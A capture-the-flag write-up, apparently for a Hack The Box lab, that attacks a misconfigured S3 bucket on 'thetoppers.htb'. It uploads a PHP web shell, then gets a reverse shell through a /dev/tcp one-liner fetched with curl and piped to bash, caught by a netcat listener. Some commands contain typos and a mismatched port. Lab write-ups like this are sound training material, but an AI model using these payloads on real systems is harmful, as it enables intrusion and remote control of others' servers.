As usual let's start with nmap
map -sV -sC targetIp
Let's add the target Ip in the /etc/hosts file
cd /etc
sudo nano hosts
We found port 80 is open. So let's check the website:
Now let's use gobuster to enumerate any subdomains
gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb --append-domain
we found s3.thetoppers.htb
Let's add s3.thetoppers.htb in the /etc/hosts file too
We can interact with the S3 bucket using awscli
sudo apt install awscli
aws configure
just type "temp" for everything
We can list all of the S3 buckets hosted by the server using ls command
aws --endpoint=http://s3.thehoppers.htb s3 ls
we can use the ls command to list objects and common prefixes under the specified bucket
aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb
we can see files index.php and .htaccess and a directory called images in the S3 bucket
it looks like apache server is using this s3 bucket as storage
We can use awscli not only to read files using ls but we can also copy files to a remote bucket.
First let's create the shell.php that contains the code below:
<?php system($_GET["cmd"]); ?>
now let's copy shell.php onto the remote bucket using:
aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb
we have successfully uploaded shell.php onto the bucket
let's go back to our browser and type:
thetoppers.htb/shell.php?cmd=id
this confirms we got code execution on the box
Now, through a reverse shell we will now trigger the victim to connect back to our attacker's machine.
let's get a reverse shell by creating a new file shell.sh containing:
#!/bin/bash
bash -i >& /dev/tcp/<attackerIP>/1337 0>&1
now let's listen on port 1377 using
nc -lnvp 1337
now we need to host the shell.sh onto our web server
let's create a local web server using:
python3 -m http.server 8000
we can use curl to fetch the shell.sh file from our local host and then pipe it to bash in order to execute it
http://thetoppers.htb/shell.php?cmd=curl%20<attackerip>:8000/shell.sh|bash
let's go back to our netcat listener and we got the shell!
the flag is in the flag.txt file
Comments